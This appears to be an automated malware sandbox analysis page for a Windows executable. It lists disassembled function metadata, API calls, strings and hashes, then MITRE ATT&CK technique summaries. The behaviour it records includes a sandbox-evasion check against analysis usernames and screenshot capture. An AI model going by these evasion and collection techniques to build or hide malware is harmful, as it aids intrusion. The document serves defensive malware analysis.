Uniqueness

Uniqueness Score: -1.00%

Function 0042A597, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042A5C3

Strings

winTruncate2, xrefs: 0042A66E
winSeekFile, xrefs: 0042A619
winTruncate1, xrefs: 0042A638

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: winSeekFile$winTruncate1$winTruncate2
API String ID: 885266447-2471937615
Opcode ID: 1c8d9ab361d10f395408155b561f57eafaf3d01c2bd75864c8d316e401506e8b
Instruction ID: 642872cf144292ce380656267c1caa355662be5d6ecceb4d4d646ed668637c1d
Opcode Fuzzy Hash: 1c8d9ab361d10f395408155b561f57eafaf3d01c2bd75864c8d316e401506e8b
Instruction Fuzzy Hash: 8531D471700700AFDB20DF64D981A6B73E5EB48354F58852EFA56C7780D734EC108B6A

Uniqueness

Uniqueness Score: -1.00%

Function 0046A70D, Relevance: 6.1, APIs: 4, Instructions: 130COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0046A7A8
__flush.LIBCMT ref: 0046A7C6
__write.LIBCMT ref: 0046A7ED
__flsbuf.LIBCMT ref: 0046A818

Part of subcall function 0046DC1D: __getptd_noexit.LIBCMT ref: 0046DC1D

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 942dbabadbfdfae57a7228a6fec992bbcd9bf710ad7a599f01ff3c3f9f765826
Instruction ID: 99fd477ee49c171c5577050ce4ac4873b8c1395194221a09395d197efb4badea
Opcode Fuzzy Hash: 942dbabadbfdfae57a7228a6fec992bbcd9bf710ad7a599f01ff3c3f9f765826
Instruction Fuzzy Hash: F341B631A00B04DBDB249F66888565FBBB5EF80355F24812FE415A7240F778ED628F5B

Uniqueness

Uniqueness Score: -1.00%

Function 0047C5EA, Relevance: 6.1, APIs: 4, Instructions: 103COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0047C61E
__isleadbyte_l.LIBCMT ref: 0047C651
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,?,?,00000000,?,00000000), ref: 0047C682
MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,00000000,00000000,?,?,?,00000000,?,00000000), ref: 0047C6F0

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 1f9a13d97f9ff9e9d371f6cdf497ec24dd392e21f3422c53df5f7505a3ba407a
Instruction ID: b4561495634a5b0c3006078bdcec14c795380a58e59b8f9e8402e2d7b0702795
Opcode Fuzzy Hash: 1f9a13d97f9ff9e9d371f6cdf497ec24dd392e21f3422c53df5f7505a3ba407a
Instruction Fuzzy Hash: 9B319D31A00256EFDF20DF68C8C09FE3BA5AF01311B15C56EE4699B291E734DD41DB69

Uniqueness

Uniqueness Score: -1.00%

Function 004600B7, Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 004600CE
_malloc.LIBCMT ref: 004600E1
_free.LIBCMT ref: 00460163

Part of subcall function 00469CC4: RtlFreeHeap.NTDLL(00000000,00000000,?,0047029E,00000000,?,?,00467640,00000001,00000000,?,?,?,0046769E,00402DA3), ref: 00469CDA
Part of subcall function 00469CC4: GetLastError.KERNEL32(00000000,?,0047029E,00000000,?,?,00467640,00000001,00000000,?,?,?,0046769E,00402DA3), ref: 00469CEC

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EncodersErrorFreeGdipHeapImageLastSize_free_malloc
String ID:
API String ID: 34177290-0
Opcode ID: 2aed0e7672fb0a96efddfcfca89bf857d5c40103165effc137df2a4d6f00dbdc
Instruction ID: 2d56ff54f79681364d4f5e1a6a65b0e72e6f3bb7c281cecae8ca0d54260d2aa5
Opcode Fuzzy Hash: 2aed0e7672fb0a96efddfcfca89bf857d5c40103165effc137df2a4d6f00dbdc
Instruction Fuzzy Hash: C8218E72D00128EACB21DFA488804EFB779EF26764B214657E82067391F7379E41DA96

Uniqueness

Uniqueness Score: -1.00%

Function 00404B35, Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00404B3C
_strtok.LIBCMT ref: 00404B50

Part of subcall function 004688ED: __getptd.LIBCMT ref: 0046890B

CreateDirectoryA.KERNEL32(?,00000000,004867F4,00000001,00000000,?,?,?,?,?,?,00000024), ref: 00404B8E
_strtok.LIBCMT ref: 00404B99

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _strtok$CreateDirectoryH_prolog3___getptd
String ID:
API String ID: 2807274917-0
Opcode ID: 7ebbc485fd256d463c43b497327868a2088e4563bdbff4985e3ae37dd39f99d7
Instruction ID: c00c0b13d2eb97a9500ad8ca0f7c6bae2051a4746c57236e8e316e2086169b3d
Opcode Fuzzy Hash: 7ebbc485fd256d463c43b497327868a2088e4563bdbff4985e3ae37dd39f99d7
Instruction Fuzzy Hash: CD0112B1D04209AEDB04FBE5DC96EEE7778AB44314F50842FF211B71C1DA78A9448B6D

Uniqueness

Uniqueness Score: -1.00%

Function 0047C4D7, Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(00000000,00473DAD,00000000,00000000,75145970,?,00469EDB,0040FD3B,00000000,?,?,?,?,?,?,00000000), ref: 0047C4DA
__malloc_crt.LIBCMT ref: 0047C509
FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,00000000,?,00469EDB,0040FD3B,00000000,?,?,?,?,?,?,00000000,751881D0), ref: 0047C516

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: 2be7cd3326a088ed2a088b669b77e5926a236439420ce32b0bde0539deb32a61
Instruction ID: c9f8133cabd6fc53cb03a4f754deabf1a4e7ee2ab1e7ae05eb5789f7ed8208f2
Opcode Fuzzy Hash: 2be7cd3326a088ed2a088b669b77e5926a236439420ce32b0bde0539deb32a61
Instruction Fuzzy Hash: B0F02E775041206A8F317B34BCC98EB1738CBD576531AC41FF805C3340F6298E8283AA

Uniqueness

Uniqueness Score: -1.00%

Function 00460290, Relevance: 6.0, APIs: 4, Instructions: 34fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 004602AB
GetFileSizeEx.KERNEL32(00000000,?), ref: 004602C3
CloseHandle.KERNEL32(00000000), ref: 004602CE
CloseHandle.KERNEL32(00000000), ref: 004602D6

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseFileHandle$CreateSize
String ID:
API String ID: 4148174661-0
Opcode ID: 52ee9af0e4d272adebe8ceddfa3e02de93de0e35db65c026b63c00b4c1fbe4a7
Instruction ID: 3929fc40e37e5bf832a2161d2b7940c379898db2911504cee8344e2643e5e6dd
Opcode Fuzzy Hash: 52ee9af0e4d272adebe8ceddfa3e02de93de0e35db65c026b63c00b4c1fbe4a7
Instruction Fuzzy Hash: 08F05E31640214FBE6109B64DC0DF9F3B68AB06B61F204665FA12B22D4F770AF01866E

Uniqueness

Uniqueness Score: -1.00%

Function 00460616, Relevance: 6.0, APIs: 4, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

numpunct.LIBCPMT ref: 00460619
__CxxThrowException@8.LIBCMT ref: 00460622

Part of subcall function 00467D41: RaiseException.KERNEL32(?,?,00402DB8,?,?,?,?,?,00402DB8,?,00495EC8,00000000), ref: 00467D83

GdipCloneImage.GDIPLUS(00000000,00000000), ref: 0046063A
GdipAlloc.GDIPLUS(00000010,00000000,00000000), ref: 00460648

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Gdip$AllocCloneExceptionException@8ImageRaiseThrownumpunct
String ID:
API String ID: 2212125544-0
Opcode ID: 6e1dc8eeb764baa256507b6392ac2f48d3a763622a5971c53bb621712d151485
Instruction ID: 1c918faf767dcd049ce9fe58c869e3565db8942579907732b7633133e67ba1f9
Opcode Fuzzy Hash: 6e1dc8eeb764baa256507b6392ac2f48d3a763622a5971c53bb621712d151485
Instruction Fuzzy Hash: E0F054B1500305AFDB149F51CD42A6B77ECEF40348F14846EAD0557251FB78ED00C65A

Uniqueness

Uniqueness Score: -1.00%

Function 0044E1EA, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0044E395

Strings

too many levels of trigger recursion, xrefs: 0044E233
out of memory, xrefs: 0044F03A

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset
String ID: out of memory$too many levels of trigger recursion
API String ID: 2102423945-3387558265
Opcode ID: e817613e6b9cdfc81c0aad5d4f867e4cefc41331d9d1ba63d486cbade4a42b18
Instruction ID: 6d9d8018e0c231eadf151d56a280d363aa50e131c240ac9881285ff8efbf5509
Opcode Fuzzy Hash: e817613e6b9cdfc81c0aad5d4f867e4cefc41331d9d1ba63d486cbade4a42b18
Instruction Fuzzy Hash: E7814AB5A04615DFDB28CF15D490B99BBB1FF48300F2481AED84A9B786DB34E851CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0043EAE1, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 131COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0043EBBB

Strings

N{A, xrefs: 0043EBD0, 0043EBEC
F@B, xrefs: 0043EB0F, 0043EB57

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset
String ID: F@B$N{A
API String ID: 2102423945-261674976
Opcode ID: 7e0b43fe50ec0e054df14ba368f21b4fa62d7145365396d2df4b06a9756a42e5
Instruction ID: 0c85e3b896153d88fc9cb6b37d602cffde76745b8f866fbd0bb27bc9d469d396
Opcode Fuzzy Hash: 7e0b43fe50ec0e054df14ba368f21b4fa62d7145365396d2df4b06a9756a42e5
Instruction Fuzzy Hash: 77410471505214EFC720BF22BF8256A7324EB7836DF11253FE505462A2E73D1C81AACD

Uniqueness

Uniqueness Score: -1.00%

Function 00404591, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004045D6
_memmove.LIBCMT ref: 00404607

Strings

string too long, xrefs: 004045D1

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 256744135-2556327735
Opcode ID: bf90bdf99d4632acbd7983be2cdf2da1a3094c86e6c13c34d657a2c2e33187b9
Instruction ID: 90df72f4bc0cd57feeb466dfa3493a57e8c7debaaf21933f7ddf2ac7252c12c6
Opcode Fuzzy Hash: bf90bdf99d4632acbd7983be2cdf2da1a3094c86e6c13c34d657a2c2e33187b9
Instruction Fuzzy Hash: E6119371304650ABD6349E2D895092BB7E5EFC1704B140E3FB282672C1DB79D805876A

Uniqueness

Uniqueness Score: -1.00%

Function 00462489, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00462490
std::_Xinvalid_argument.LIBCPMT ref: 004624A7

Part of subcall function 00466492: std::exception::exception.LIBCMT ref: 004664A7
Part of subcall function 00466492: __CxxThrowException@8.LIBCMT ref: 004664BC
Part of subcall function 00466492: std::exception::exception.LIBCMT ref: 004664CD

Strings

vector<T> too long, xrefs: 004624A2

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::exception::exception$Exception@8H_prolog3_catchThrowXinvalid_argumentstd::_
String ID: vector<T> too long
API String ID: 1877048013-3788999226
Opcode ID: 7b9f98c63b0a25da4181186446a22d04b89eedb6aba451d1494b0826d23661e0
Instruction ID: f67b13cd1f7c64a3ea541d0528415707fec555d4af96195ef9ba46ad37928bda
Opcode Fuzzy Hash: 7b9f98c63b0a25da4181186446a22d04b89eedb6aba451d1494b0826d23661e0
Instruction Fuzzy Hash: FB113A76200700BFC720EF69CD81E1ABBE5EF44700F10882FF58587241EAB5E950CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040CAD2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040CB18
_memmove.LIBCMT ref: 0040CB4E

Strings

string too long, xrefs: 0040CB13

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 256744135-2556327735
Opcode ID: 5be94b7a398abf88fc62a4e399b5a8dfff58b779cc6872d2fe121c1251b8849b
Instruction ID: 5a722604add717640f9ba49502f62fb4648f0657bd417dbaf2d8a42057e76976
Opcode Fuzzy Hash: 5be94b7a398abf88fc62a4e399b5a8dfff58b779cc6872d2fe121c1251b8849b
Instruction Fuzzy Hash: C411AB31304600D7C520EF6D9D85D1BB7B5AFC1714B11072FB442B32D1DB38A905CAA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404249, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 0045F3B7: GetUserNameA.ADVAPI32(?,?), ref: 0045F3EC

ExitProcess.KERNEL32 ref: 004042CA

Strings

JohnDoe, xrefs: 0040426E
HAL9TH, xrefs: 004042A5

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitNameProcessUser
String ID: HAL9TH$JohnDoe
API String ID: 282088302-3469431008
Opcode ID: 9c4a05cbca9e4971742319d63c9630c54ff4adc095b710f6e13af260675afc9e
Instruction ID: a44788af027f9dd1aff2a21de129c884005c5146174d01716b92837e19f9833c
Opcode Fuzzy Hash: 9c4a05cbca9e4971742319d63c9630c54ff4adc095b710f6e13af260675afc9e
Instruction Fuzzy Hash: 9C01A9716452089FEB04EBA5D986FDD73A8EB09704F40047FF502B71E1DE789948C669

Uniqueness

Uniqueness Score: -1.00%

Function 0042CACA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 0042CB0A

Part of subcall function 0042C73A: _memset.LIBCMT ref: 0042C77C

Strings

DELETE FROM %Q.%s WHERE %s=%Q, xrefs: 0042CB2D
sqlite_stat%d, xrefs: 0042CB02

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __fprintf_l_memset
String ID: DELETE FROM %Q.%s WHERE %s=%Q$sqlite_stat%d
API String ID: 4274417252-3667113883
Opcode ID: a32b2e93c0948379f4ad55548d37ef94994081cf509540a596bb87d0bfefca72
Instruction ID: 4e4bbbea80832f861c01b53a8ceed376e17d4579ee15504a17a45272a25a8323
Opcode Fuzzy Hash: a32b2e93c0948379f4ad55548d37ef94994081cf509540a596bb87d0bfefca72
Instruction Fuzzy Hash: 25115E71A0011DABCF04DFD9DC81ADEB7B9FF49318F10006AE505B7241E739A905CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00426C28, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 00426C62

Strings

%!.15g, xrefs: 00426C58
%lld, xrefs: 00426C4A

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __fprintf_l
String ID: %!.15g$%lld
API String ID: 3906573944-2983862324
Opcode ID: d293c31393d2ee8fc47e58339c31be2357b3781f43d9eac174bab924335f4ddf
Instruction ID: 06ac19610f5184229030336a38be9b02d29dedadd2dedddfc7cdae57250de72e
Opcode Fuzzy Hash: d293c31393d2ee8fc47e58339c31be2357b3781f43d9eac174bab924335f4ddf
Instruction Fuzzy Hash: AB01B1B1604751AAD731ABA7E806727BBE0AF04710F208C1FF4E6845D2C72CE480971D

Uniqueness

Uniqueness Score: -1.00%

Function 0046016E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0045FF03: GdipAlloc.GDIPLUS(00000010,0046018A,?,00000000), ref: 0045FF05

Part of subcall function 004600B7: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 004600CE

GdipSaveImageToFile.GDIPLUS(?,screenshot.jpg,?,00000000), ref: 004601AB

Strings

image/jpeg, xrefs: 00460190
screenshot.jpg, xrefs: 004601A3

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Gdip$Image$AllocEncodersFileSaveSize
String ID: image/jpeg$screenshot.jpg
API String ID: 2572949680-3715547155
Opcode ID: b0517da4fb1eaaba302a9684bffc3c6f08a1d6dfe89aa7a4805665cada2cec43
Instruction ID: 7a57e75ca1768edc6c65ef545af934658a787f414639848eab7f3a9d33611f74
Opcode Fuzzy Hash: b0517da4fb1eaaba302a9684bffc3c6f08a1d6dfe89aa7a4805665cada2cec43
Instruction Fuzzy Hash: 90F03671A10305ABDB10EB65CD42F9F77E89F14708F50006BF905DB291EB65A904CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00460310, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 00460340
__CxxThrowException@8.LIBCMT ref: 00460355

Part of subcall function 00467CC1: _malloc.LIBCMT ref: 00467CDB

Strings

8-@, xrefs: 0046034E

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: 8-@
API String ID: 4063778783-2211411525
Opcode ID: fefc8e0f60fbba98b0939a4e68a8638a26271afbd7a2c4f85e1333e854d58947
Instruction ID: 0df25e3d1f1bed0149a28c4af024d16b98eecca61c5793de9f239fe40cd15379
Opcode Fuzzy Hash: fefc8e0f60fbba98b0939a4e68a8638a26271afbd7a2c4f85e1333e854d58947
Instruction Fuzzy Hash: B8E09B755106096BCF1CFB69D4516EF7BAC5F00749F10442FE801D5241FB78D644875E

Uniqueness

Uniqueness Score: -1.00%

Function 00462149, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00462150

Part of subcall function 00411E1C: __EH_prolog3.LIBCMT ref: 00411E23

Strings

-#F, xrefs: 00462160
H<@, xrefs: 0046217A

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog3
String ID: -#F$H<@
API String ID: 431132790-830177581
Opcode ID: b6e1030403a70a675587aa562dbd9d912171b4e33ce7162f0704a40472f3b4d1
Instruction ID: f1a89b40ffa2e15e5409517ec97d96a03a3ae3c430ca20567ffcd6a2c48a8764
Opcode Fuzzy Hash: b6e1030403a70a675587aa562dbd9d912171b4e33ce7162f0704a40472f3b4d1
Instruction Fuzzy Hash: FCE0BF786002148FD710EF59C549A9CB7E0BF04308F45859EE9418B365DBB8DD05CB59

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report GzsKHwvBmG.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

